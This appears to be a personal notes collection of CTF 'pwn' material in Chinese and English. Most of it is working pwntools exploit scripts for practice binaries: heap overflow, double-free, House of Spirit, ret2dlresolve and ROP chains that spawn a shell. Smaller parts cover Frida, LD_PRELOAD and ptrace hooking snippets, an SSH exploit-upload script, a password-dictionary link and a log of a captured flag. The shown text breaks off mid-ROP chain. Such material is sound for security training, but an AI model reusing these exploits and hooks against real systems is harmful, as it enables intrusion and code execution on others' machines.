Frida
from pwn import *
import frida
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
system_addr = ""
proc_addr = ""
def PrintMessage(message,data):
if(message["type"] == "send"):
global system_addr
global proc_addr
if("system" in message["payload"]):
system_addr = message["payload"][-14::]
if("pro_addr" in message["payload"]):
proc_addr = message["payload"][-14::]
print("[*] var {0}".format(message["payload"]))
elif(message['type'] == 'error'):
for i in message:
if(i == 'type'):
print('[*] %s' % 'error:')
continue
if(type(message[i]) is str):
print('[*] %s' % i + ':\n\t{0}'.format(message[i].replace(' ', ' ')))
else:
print('[*] %s' % i + ':\n\t{0}'.format(message[i]))
else:
print(message)
jscode = '''
var pro_addr = Module.findBaseAddress('re');
send("pro_addr: " + pro_addr);
var exports = Module.enumerateExportsSync("/lib/x86_64-linux-gnu/libc.so.6");
for(var i=0;i<exports.length;i++){
if(exports[i].name == "system"){
send("name: "+exports[i].name+" address: "+exports[i].address);
}
}
'''
p_pwn = process("./re")
p = frida.attach("re")
script = p.create_script(jscode)
script.on('message',PrintMessage)
script.load()
system_addr = int(system_addr,16)
proc_addr = int(proc_addr,16)
print("system_addr: " + hex(system_addr))
print("proc_addr: " + hex(proc_addr))
pay = b"a"*24 + p64(proc_addr + 0x753) + p64(proc_addr +0x774) + p64(system_addr)
#sys.stdin.read()
p_pwn.sendline(pay)
p_pwn.interactive()
'''
var pro_addr = Module.findBaseAddress('re');
send("pro_addr: " + pro_addr);
console.log(hexdump(pro_addr, {
offset: 743,
length: 750,
header: true,
ansi: true
}));
'''
LKM Makefile
KVERS = $(shell uname -r)
# Kernel modules name
obj-m += file_name.o
# Many file.c
#modulename-objs := file1.o file2.o
# Specify flags for the module compilation.
#EXTRA_CFLAGS=-g -O0
build: kernel_modules
kernel_modules:
make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules
clean:
make -C /lib/modules/$(KVERS)/build M=$(CURDIR) clean
Linux Hook
//main.c
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
if( strcmp(argv[1], "test") )
{
printf("Incorrect password\n");
}
else
{
printf("Correct password\n");
}
return 0;
}
//hook.c
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
/*
hook的目標是strcmp,所以typedef了一個STRCMP函數指針
hook的目的是要控制函數行爲,從原庫libc.so.6中拿到strcmp指針,保存成old_strcmp以備調用
*/
typedef int(*STRCMP)(const char*, const char*);
int strcmp(const char *s1, const char *s2)
{
static void *handle = NULL;
static STRCMP old_strcmp = NULL;
if( !handle )
{
handle = dlopen("libc.so.6", RTLD_LAZY);
old_strcmp = (STRCMP)dlsym(handle, "strcmp");
}
printf("oops!!! hack function invoked. s1=<%s> s2=<%s>\n", s1, s2);
return 0;
}
gcc -o test main.c
gcc -fPIC -shared -o hook.so hook.c -ldl
LD_PRELOAD=./hook.so ./test 123
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/reg.h> /* For constants ORIG_EAX etc */
#include <sys/user.h>
void new_show()
{
printf("Hooked by cc-sir!\n");
}
int main(int argc, char *argv[])
{
if(argc!=2) {
printf("Usage: %s pid\n", argv[0]);
return 1;
}
struct user_regs_struct reg;
pid_t pid = atoi(argv[1]);
ptrace(PTRACE_ATTACH, pid,NULL,NULL);
wait(NULL);
ptrace(PTRACE_GETREGS,pid,NULL,®);
printf("rip: 0x%lx\n",reg.rip);
long addr = reg.rip;
long show_addr = 0x400586;
long code = 0xcc80cd;
long back_code;
int id;
back_code = ptrace(PTRACE_PEEKTEXT, pid, addr, NULL); //保留源碼
printf("back_code: %llx\n",back_code);
if(ptrace(PTRACE_POKETEXT, pid, addr, code) < 0){ //修改源碼
perror("PTRACE_POKETEXT");
return 0;
}
ptrace(PTRACE_CONT, pid, NULL, NULL);
wait(NULL);
printf("The process has int 0x3!\n");
getchar();
if(ptrace(PTRACE_POKETEXT, pid, addr, back_code) < 0){ //還原代碼
perror("PTRACE_POKETEXT");
return 0;
}
ptrace(PTRACE_SETREGS, pid, NULL, ®); //還原寄存器
ptrace(PTRACE_CONT, pid, NULL, NULL);
printf("The process has continue run!\n");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return 0;
}
linux對apk簽名
keytool -genkey -v -alias KeyName -keyalg RSA -keysize 2048 -validity 10000 -keystore KeyFileName.keystore
jarsigner -verbose -keystore KeyFileName.keystore apk_file.apk KeyName
Linux 編譯libc.so
libc: sir.c:
int add(int a, int b){
return a+b;
}
編譯:
gcc -fPIC -shared -o libsir.so sir.c
調用:
sir.h
#ifndef __SIR_H__
#define __SIR_H__
int add(int n1, int n2);
#endif
test.c:
#include<stdio.h>
#include"sir.h"
int main(){
int sum;
sum = add(6,4);
printf("%d\n",sum);
return 0;
}
編譯
gcc test.c -o test -L ./ -lsir
運行:
LD_LIBRARY_PATH=./ ./test
字符串畫圖片
from PIL import Image, ImageDraw, ImageFont
font_size = 12
text = "xxxx!"
img_path = "/home/cc-sir/desktop/xx.jpg"
img_raw = Image.open(img_path)
img_array = img_raw.load()
img_new = Image.new("RGB", img_raw.size, (0, 0, 0))
draw = ImageDraw.Draw(img_new)
font = ImageFont.truetype('/home/cc-sir/desktop/msyh.ttc', font_size)
def character_generator(text):
while True:
for i in range(len(text)):
yield text[i]
ch_gen = character_generator(text)
for y in range(0, img_raw.size[1], font_size):
for x in range(0, img_raw.size[0], font_size):
draw.text((x, y), next(ch_gen), font=font, fill=img_array[x, y], direction=None)
img_new.convert('RGB').save("/home/cc-sir/desktop/hh.jpeg")
攻防世界
Noleak
部分地址覆蓋爆破:
# -*- coding: utf-8 -*-
from pwn import *
#context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./timu"
p = process(name)
#p = remote("111.198.29.45",31616)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
#libc=ELF('./libc.so.6')
if args.G:
gdb.attach(p)
def add(s,data):
p.recvuntil("Your choice :")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline(s)
p.recvuntil("Data: ")
p.send(data)
def delete(i):
p.recvuntil("Your choice :")
p.sendline("2")
p.recvuntil("Index: ")
p.sendline(i)
def update(i,s,data):
p.recvuntil("Your choice :")
p.sendline("3")
p.recvuntil("Index: ")
p.sendline(i)
p.recvuntil("Size: ")
p.sendline(s)
p.recvuntil("Data: ")
p.send(data)
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
add("180",b"1"*16*6 + p64(0) + p64(0x41)) #0
add("100","2"*8) #1
add("100","3"*8) #2
add("100","4"*8) #3
add("100","5"*8) #4
#delete("0")
delete("2")
delete("3")
update("3","100",p64(0x600ff5))
add("100","6"*8) #5
add("100","7"*59 + "\x00") #6
update("0","100",p64(0) + b"\x71")
update("6","100","7"*59 + "\x10")
delete("0")
update("6","100","7"*59 + "\x00")
update("0","100",p64(0) + b"\xc1")
update("6","100","7"*59 + "\x10")
delete("0")
# malloc_hook = 0x9aed
update("6","100","7"*59 + "\x00")
update("0","100",p64(0) + b"\x71")
update("6","100",shellcode + "7"*(59-len(shellcode)) + "\x10")
update("0","100",p16(0x6aed))
add("100","sir")
add("100",b"8"*19 + p64(0x600ff5+0x10))
p.recvuntil("Your choice :")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline("1")
p.interactive()
supermarket
漏洞在於realloc, 當重新分配的new_size < pre_size, 返回原指針; new_size > pre_size釋放原指針, 重新分配內存.
可以用堆覆蓋,大堆編輯其中的小堆:
# -*- coding: utf-8 -*-
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./supermarket"
p = process(name)
#p = remote("111.198.29.45",38460)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
libc=ELF('./libc.so.6')
if args.G:
gdb.attach(p)
# 漏洞在realloc, 當重新分配的new_size < pre_size, 返回原指針; new_size > pre_size釋放原原指針, 重新分配內存.
def add(name,size,description):
p.recvuntil("your choice>> ")
p.sendline("1")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("price:")
p.sendline("100")
p.recvuntil("descrip_size:")
p.sendline(str(size))
p.recvuntil("description:")
p.sendline(description)
def change(name,size,description):
p.recvuntil("your choice>> ")
p.sendline("5")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("descrip_size:")
p.sendline(str(size))
p.recvuntil("description:")
p.sendline(description)
def show():
p.recvuntil("your choice>> ")
p.sendline("3")
# 0x08048864
add('aaaa',0x20,"1111")
add('bbbb',0x80,"2222")
add('cccc',0x20,"3333")
change("bbbb",0xb0,"q")
add("dddd",0x50,'4444')
pay = b"dddd\x00" + b'q'*11 + p32(0x64) + p32(0x50) + p32(0x804b048)
change("bbbb",0x80,pay)
show()
p.recvuntil("dddd: price.100, des.")
atoi_addr = u32(p.recv(4))
libc_addr = atoi_addr - libc.symbols['atoi']
system_addr = libc_addr + libc.symbols['system']
success("atoi_addr: " + hex(atoi_addr))
pay1 = p32(system_addr)
change("dddd",0x50,pay1)
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")
p.interactive()
note-service2
# -*- coding: utf-8 -*-
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./pwn"
p = process(name)
#p = remote("111.198.29.45",54704)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# libc=ELF('./pwn')
if args.G:
gdb.attach(p)
def add(i,data):
p.recvuntil("your choice>> ")
p.sendline("1")
p.recvuntil("index:")
p.sendline(str(i))
p.recvuntil("size:")
p.sendline('8')
p.recvuntil("content:")
p.send(data)
def delete(i):
p.recvuntil("your choice>> ")
p.sendline("4")
p.recvuntil("index:")
p.sendline(str(i))
add(0,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(1,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(2,asm('mov eax,0x3b') + b'\xeb\x19')
add(3,asm('xor rsi,rsi') + b'\x90\x90\xeb\x19')
add(4,asm('xor rdx,rdx') + b'\x90\x90\xeb\x19')
add(5,asm('syscall') + b'\x90'*5)
delete(0)
add(-8,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")
p.interactive()
Python base64替換密碼錶
import base64
import string
x = "5rFf7E2K6rqN7Hpiyush7E6S5fJg6rsi5NBf6NGT5rs="
base_now = ['v', 'w', 'x', 'r', 's', 't', 'u', 'o', 'p', 'q', '3', '4', '5', '6', '7', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'y', 'z', '0', '1', '2', 'P', 'Q', 'R', 'S', 'T', 'K', 'L', 'M', 'N', 'O', 'Z', 'a', 'b', 'c', 'd', 'U', 'V', 'W', 'X', 'Y', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', '8', '9', '+', '/']
base_now_str = ''.join(base_now)
print len(base_now_str)
base_original_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
print len(base_original_str)
flag = base64.b64decode(x.translate(string.maketrans(base_now_str, base_original_str)))
print flag
babystack
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./pwn"
p = process(name)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('./babystack/libc-2.27.so')
if args.G:
gdb.attach(p)
p.recvuntil("What's your name: ")
pay = "a" * 133 + 'b'*4
p.send(pay)
p.recvuntil("bbbb")
cannary = u64('\x00' + p.recv(7))
core_starr = u64(p.recv(6) + '\x00\x00') - 0x910
success("canary: " + hex(cannary))
success("core_starr: " + hex(core_starr))
pop_rdi = core_starr + 0x973 #pop rdi; ret;
pay = 'a'*136 + p64(cannary) + p64(core_starr + 0x80a)
p.recvuntil("What do you want to say: ")
p.sendline(pay)
p.recvuntil("What's your name: ")
pay = "a" * (136+8) + 'b'*8
p.send(pay)
p.recvuntil("b" * 8)
lib_starr = u64(p.recv(6) + '\x00\x00') - 0x441270 #libc.symbols['__libc_start_main'] #0x441270
success("lib_starr: " + hex(lib_starr))
p.recvuntil("What do you want to say: ")
bin_sh = lib_starr + 0x5829d9 #libc.search['/bin/sh']#
system_addr = lib_starr + 0x460480 #libc.symbols['system']#0x460480
pay = 'c'*136 + p64(cannary) + "qqqqqqqq" + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
p.send(pay)
p.interactive()
'''
libc2.23:
system_offset = 0x45390 # 0x3f480
bin_sh_offset = 0x18cd57 # 0x1619d9
free_offset = 0x3e3e90
malloc_offset = 0x3e3e40
malloc_hook_offset = 0x3c4b10
free_hook_offset = 0x3c67a8
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
CTF-wiki
2017 0ctf bheap
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './bheap'
elf = ELF(name)
p = process(name)
#p = remote("111.198.29.45",30617)
if args.G:
gdb.attach(p)
def alloc(s):
p.recvuntil("Command: ")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline(str(s))
def fill(i,s,data):
p.recvuntil("Command: ")
p.sendline("2")
p.recvuntil("Index: ")
p.sendline(str(i))
p.recvuntil("Size: ")
p.sendline(str(s))
p.recvuntil("Content: ")
p.sendline(data)
def free(i):
p.recvuntil("Command: ")
p.sendline("3")
p.recvuntil("Index: ")
p.sendline(str(i))
def dump(i):
p.recvuntil("Command: ")
p.sendline("4")
p.recvuntil("Index: ")
p.sendline(str(i))
alloc(10) # 0
alloc(10) # 1
alloc(10) # 2
alloc(10) # 3
alloc(10) # 4
alloc(0x80) # 5
free(1)
free(3)
payload = 'a'*24 + p64(0x21) + p8(0xa0)
fill(2,len(payload),payload)
payload = 'a'*24 + p64(0x21)
fill(4,len(payload),payload)
alloc(10) # 1
alloc(10) # 3 5
payload = 'a'*24 + p64(0x91)
fill(4,len(payload),payload)
alloc(0x80) # 6
free(5)
dump(3)
p.recvuntil("Content: \n")
main_arena = u64(p.recv(6) + '\x00\x00') - 0x58
success("main_arena: " + hex(main_arena))
alloc(0x60) # 5
free(5)
payload = p64(main_arena-0x33)
fill(3,len(payload),payload)
alloc(0x60) # 5
alloc(0x60) # 6
one_gadget = main_arena - 0x399b00 + 0x3f35a
payload = '|/bin/sh;' + 'a'*10 + p64(one_gadget)
fill(7,len(payload),payload)
alloc(0x20)
p.interactive()
2015 9447 CTF : Search Engine
Double_Free:
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './search'
p = process(name)
if args.G:
gdb.attach(p)
def search(s):
p.recvuntil("3: Quit\n")
p.sendline("1")
p.recvuntil("Enter the word size:\n")
p.sendline(str(len(s)))
p.recvuntil("Enter the word:\n")
p.sendline(s)
def delete(s):
p.recvuntil("Delete this sentence (y/n)?\n")
p.sendline(s)
def index(s):
p.recvuntil("3: Quit\n")
p.sendline("2")
p.recvuntil("Enter the sentence size:\n")
p.sendline(str(len(s)))
p.recvuntil("Enter the sentence:\n")
p.sendline(s)
def offset_bin_main_arena(idx):
word_bytes = context.word_size / 8
offset = 4 # lock
offset += 4 # flags
offset += word_bytes * 10 # offset fastbin
offset += word_bytes * 2 # top,last_remainder
offset += idx * 2 * word_bytes # idx
offset -= word_bytes * 2 # bin overlap
return offset
unsortedbin_offset_main_arena = offset_bin_main_arena(0)
index("a"*0x85 + " s")
search("s")
delete('y')
search("\x00")
p.recvuntil("Found 135: ")
lib_addr = u64(p.recv(6) + '\x00\x00')
one_gadget_addr = lib_addr - 0x399b58 + 0x3f306
main_arena_addr = lib_addr - 0x58
delete('n')
index('a'*0x5d + ' d')
index('b'*0x5d + ' d')
index('c'*0x5d + ' d')
search("d")
delete("y")
delete("y")
delete("y")
search("\x00")
delete("y")
delete("n")
delete("n")
fake_chunk_addr = main_arena_addr - 0x33
fake_chunk = p64(fake_chunk_addr).ljust(0x60, 'f')
index(fake_chunk)
index('a' * 0x60) #分配chunk_a
index('b' * 0x60) #分配chunk_b
payload = '|/bin/sh;'
payload += (0x13-len(payload))*'a' + p64(one_gadget_addr)
payload = payload.ljust(0x60, 'f')
index(payload) #malloc_hook爲one_gadget
success("lib_addr: " + hex(lib_addr))
p.interactive()
2014 hack.lu oreo
House Of Spirit:
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './oreo'
p = process(name)
if args.G:
gdb.attach(p)
def add(name,descrip):
#p.recvuntil("Action: ")
p.sendline('1')
#p.recvuntil('Rifle name: ')
p.sendline(name)
#p.recvuntil('Rifle description: ')
#sleep(0.5)
p.sendline(descrip)
def show():
#p.recvuntil("Action: ")
p.sendline('2')
p.recvuntil('===================================\n')
def order():
#p.recvuntil("Action: ")
p.sendline('3')
def message(notice):
#p.recvuntil("Action: ")
p.sendline('4')
#p.recvuntil("Enter any notice you'd like to submit with your order: ")
p.sendline(notice)
name = 'a'*27 + p32(0x804a248)
descrip = 'a'*25
add(name,descrip)
show()
p.recvuntil("===================================\nName: \nDescription: ")
put_addr = u32(p.recv(4))
system_addr = put_addr - 0x24d40
success("put_addr: " + hex(put_addr))
success("system_addr: " + hex(system_addr))
for i in range(1,0x3f):
name = 'a'*27 + p32(0)
descrip = 'a'*25
add(name,descrip)
name = 'a'*27 + p32(0x804a2a8)
descrip = 'a'*25
add(name,descrip)
payload = 0x20 * '\x00' + p32(0x40) + p32(0x90)
message(payload)
order()
add('a'*4,p32(0x804a250))
notice = p32(system_addr) + '||/bin/sh\x00'
message(notice)
p.interactive()
常用URL
字典:
https://github.com/rootphantomer/Blasting_dictionary
upload
#!/usr/bin/python
from pwn import *
HOST = "12.12.12.12"
PORT = 1234
USER = "pwn"
PW = "sir"
def compile():
log.info("Compile")
os.system("gcc -w -static poc.c -o poc")
def exec_cmd(cmd):
r.sendline(cmd)
r.recvuntil("$ ")
def upload():
p = log.progress("Upload")
with open("poc", "rb") as f:
data = f.read()
encoded = base64.b64encode(data)
r.recvuntil("$ ")
for i in range(0, len(encoded), 300):
p.status("%d / %d" % (i, len(encoded)))
exec_cmd("echo \"%s\" >> benc" % (encoded[i:i+300]))
exec_cmd("cat benc | base64 -d > exp")
exec_cmd("chmod +x exp")
p.success()
def exploit(r):
compile()
upload()
r.interactive()
return
if __name__ == "__main__":
if len(sys.argv) > 1:
session = ssh(USER, HOST, PORT, PW)
r = session.run("/bin/sh")
exploit(r)
else:
r = process("./start.sh")
print util.proc.pidof(r)
pause()
exploit(r)
vmliux
#!/bin/sh
check_vmlinux()
{
# Use readelf to check if it's a valid ELF
# TODO: find a better to way to check that it's really vmlinux
# and not just an elf
readelf -h $1 > /dev/null 2>&1 || return 1
cat $1
exit 0
}
try_decompress()
{
# The obscure use of the "tr" filter is to work around older versions of
# "grep" that report the byte offset of the line instead of the pattern.
# Try to find the header ($1) and decompress from here
for pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
do
pos=${pos%%:*}
tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
check_vmlinux $tmp
done
}
# Check invocation:
me=${0##*/}
img=$1
if [ $# -ne 1 -o ! -s "$img" ]
then
echo "Usage: $me <kernel-image>" >&2
exit 2
fi
# Prepare temp files:
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0
# That didn't work, so retry after decompression.
try_decompress '\037\213\010' xy gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh' xy bunzip2
try_decompress '\135\0\0\0' xxx unlzma
try_decompress '\211\114\132' xy 'lzop -d'
try_decompress '\002!L\030' xxx 'lz4 -d'
try_decompress '(\265/\375' xxx unzstd
# Finally check for uncompressed images or objects:
check_vmlinux $img
# Bail out:
echo "$me: Cannot find vmlinux." >&2
python&&C混合編程
使用python標準庫中自帶的ctypes模塊進行python和c的混合編程,需要先查找動態鏈接庫:
sir@sir-PC:~/desktop$ ldd pwn1
linux-vdso.so.1 (0x00007ffcaa9e0000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6a323f6000)
/lib64/ld-linux-x86-64.so.2 (0x00007f6a327d9000)
from pwn import *
from ctypes import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = "./pwn1"
elf = ELF(name)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
#p = process(name)
p = remote('111.198.29.45',30261)
if args.G:
gdb.attach(p)
p.recvuntil("Your name:")
p.sendline('a'*0x20 + p64(0x1))
libc.srand(1)
for i in range(10):
num = str(libc.rand()%6+1)
p.recvuntil('number:')
p.sendline(num)
p.interactive()
qmeu
打包:
find . | cpio -o --format=newc > ../rootfs.cpio
解壓:
cpio -idmv < ../rootfs.cpio
啓動:
#!/bin/bash
qemu-system-x86_64 \
-initrd rootfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-monitor /dev/null \
-m 256M \
--nographic \
-smp cores=1,threads=1 \
-cpu kvm64,+smep \
-gdb tcp::1234
關閉 kptr_restrict:
echo 0 > /proc/sys/kernel/kptr_restrict
IDA_IDC腳本
dump數值
auto i,fp;
fp = fopen("D:\\dump.txt","wb");
for(i=0x403230;i<0x403617;i++)
fputc(Byte(i),fp);
dump彙編代碼
auto code,n,i,fp;
fp = fopen("C:\\Users\\sir\\Desktop\\dump.txt","wb");
for(i=0x401000;i<0x40106C;){
n = MakeCode(i);
fprintf(fp,"%x: %s\n",i,GetDisasm(i));
i = i + n;
}
Message("Ok!\n");
python處理文件
'''
import re
file1 = open('sir.log', 'r')
file2 = open('sir.txt', 'w')
for line in file1.readlines():
if re.match(r'^name_cn.*\n',line):
file2.write(line)
'''
# -*- coding:utf-8 -*-
#! python2
import shutil
a=0
readDir = "./sir.txt" #old
writeDir = "./new.txt" #new
lines_seen = set()
outfile = open(writeDir, "w")
f = open(readDir, "r")
for line in f:
if line not in lines_seen:
a+=1
outfile.write(line)
lines_seen.add(line)
print(a)
print('\n')
outfile.close()
print("success")
i春秋_break
from pwn import *
context.log_level = 'debug'
name = './pwn'
p = process(name)
#p = remote('106.75.2.53', 10008)
elf = ELF(name)
if args.G:
gdb.attach(p)
main_addr = 0x080486DD
p.recvuntil("Yo, what's your name:\n")
pay = 'a'*12 + p32(elf.plt['printf']) + p32(main_addr) + p32(elf.got['read']) + 'b'*4
p.sendline(pay)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.recvuntil('packing drugs...\n')
printf_addr = u32(p.recv()[4:8])
system_addr = printf_addr - 0x13e80
bin_sh_addr = printf_addr + 0x12c24a
success("printf_addr " + hex(printf_addr))
success("system_addr " + hex(system_addr))
pay1 = 'a'*12 + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr) + 'b'*4
p.sendline(pay1)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.interactive()
看雪_流浪者
#include<stdio.h>
int main() {
char source[] = "abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ" ;
char key[] = "KanXueCTF2019JustForhappy";
int y,i;
for ( i = 0; i<26 ; i++ ) {
int x = 48;
while(x<122) {
if ( x > 57 || x < 48 ) {
if ( x > 122 || x < 97 ) {
if ( x > 90 || x < 65 ) {
x++;
continue;
} else
y = x - 29;
} else {
y = x - 87;
}
} else {
y = x - 48;
}
if(y>0&&y<62&&source[y] == key[i]) {
printf("%c",x); //j0rXI4bTeustBiIGHeCF70DDM
x++;
continue;
}
x++;
}
}
return 0;
}
i春秋_loading
mmap函數可以使空間擁有可執行權限;
計算機浮點數的表示方法;
from pwn import *
import struct
p = remote('106.75.2.53',10009)
#p = process('./loading')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
gdb.attach(p)
def get_int(s):
a = struct.unpack('<f', s)[0]*2333
return struct.unpack('I', struct.pack('<I', a))[0]
for i in range(3):
p.sendline(str(get_int('\x00\x00\x00\x00')))
p.sendline(str(get_int('\x99\x89\xc3\x47'))) # mov ebx, eax
p.sendline(str(get_int('\x41\x44\x44\x44'))) # nop/align
for c in '/bin/sh\x00':
p.sendline(str(get_int('\x99\xb0'+c+'\x47'))) # mov al, c
p.sendline(str(get_int('\x57\x89\x03\x43'))) # mov [ebx], eax; inc ebx
for i in range(8):
p.sendline(str(get_int('\x57\x4b\x41\x47'))) # dec ebx
p.sendline(str(get_int('\x99\x31\xc0\x47'))) # xor eax, eax
p.sendline(str(get_int('\x99\x31\xc9\x47'))) # xor ecx, ecx
p.sendline(str(get_int('\x99\x31\xd2\x47'))) # xor edx, edx
p.sendline(str(get_int('\x99\xb0\x0b\x47'))) # mov al, 0xb
p.sendline(str(get_int('\x99\xcd\x80\x47'))) # int 0x80
p.sendline('c')
p.interactive()
[*] Switching to interactive mode
[DEBUG] Received 0xb bytes:
'try to pwn\n'
try to pwn
$ cat flag
[DEBUG] Sent 0x9 bytes:
'cat flag\n'
[DEBUG] Received 0x2b bytes:
'flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}\n'
flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}
$
[*] Closed connection to 106.75.2.53 port 10009
XDCTF_pwn01
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './main'
p = process(name)
elf= ELF(name)
rel_plt_addr = elf.get_section_by_name('.rel.plt').header.sh_addr #0x8048330
dynsym_addr = elf.get_section_by_name('.dynsym').header.sh_addr #0x80481d8
dynstr_addr = elf.get_section_by_name('.dynstr').header.sh_addr #0x8048278
resolve_plt = 0x08048380
leave_ret_addr = 0x0804851D
start = 0x804aa00
fake_rel_plt_addr = start
fake_dynsym_addr = fake_rel_plt_addr + 0x8
fake_dynstr_addr = fake_dynsym_addr + 0x10
bin_sh_addr = fake_dynstr_addr + 0x7
n = fake_rel_plt_addr - rel_plt_addr
r_info = (((fake_dynsym_addr - dynsym_addr)/0x10) << 8) + 0x7
str_offset = fake_dynstr_addr - dynstr_addr
fake_rel_plt = p32(elf.got['read']) + p32(r_info)
fake_dynsym = p32(str_offset) + p32(0) + p32(0) + p32(0x12000000)
fake_dynstr = "system\x00/bin/sh\x00\x00"
pay1 = 'a'*108 + p32(start - 20) + p32(elf.plt['read']) + p32(leave_ret_addr) + p32(0) + p32(start - 20) + p32(0x100)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(pay1)
pay2 = p32(0x0) + p32(resolve_plt) + p32(n) + 'aaaa' + p32(bin_sh_addr) + fake_rel_plt + fake_dynsym + fake_dynstr
p.sendline(pay2)
success(".rel_plt: " + hex(rel_plt_addr))
success(".dynsym: " + hex(dynsym_addr))
success(".dynstr: " + hex(dynstr_addr))
success("fake_rel_plt_addr: " + hex(fake_rel_plt_addr))
success("fake_dynsym_addr: " + hex(fake_dynsym_addr))
success("fake_dynstr_addr: " + hex(fake_dynstr_addr))
success("n: " + hex(n))
success("r_info: " + hex(r_info))
success("offset: " + hex(str_offset))
success("system_addr: " + hex(fake_dynstr_addr))
success("bss_addr: " + hex(elf.bss()))
p.interactive()
sha1加密
from hashlib import *
i = 0
while(1):
pwd = str(i)
s1 = sha1()
s1.update(pwd.encode('utf-8'))
result = s1.hexdigest()
if '40bd001563085f' in result:
print("flag: " + str(i))
break
i += 1
print(result)
2017湖湘杯_pwn300
程序在計算加減乘除功能的時候,將結果保存在申請的堆中,最後將堆中的結果複製到棧中,這就導致了可能會棧溢出;
然後 程序又是通過靜態編譯的,可以在程序中找到合適ROP鏈;
ROPgadget --binary pwn300 --ropchain
然後程序又只能輸入十進制的數,可以通過ctypes.c_int32(j).value的方式輸入;
from pwn import *
import binascii
import ctypes as ct
from struct import pack
#context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './helloworld'
io = process(name)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
gdb.attach(io)
def base_addr(pro_addr,offset):
return eval(pro_addr)-offset
p=[]
p.append( 0x0806ed0a) # pop edx ; ret
p.append( 0x080ea060) # @ .data
p.append( 0x080bb406) # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('nib/')))
p.append( 0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append( 0x0806ed0a) # pop edx ; ret
p.append( 0x080ea064) # @ .data + 4
p.append( 0x080bb406) # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('hs//')))
p.append(0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append(0x0806ed0a) # pop edx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x08054730) # xor eax, eax ; ret
p.append(0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append(0x080481c9) # pop ebx ; ret
p.append(0x080ea060) # @ .data
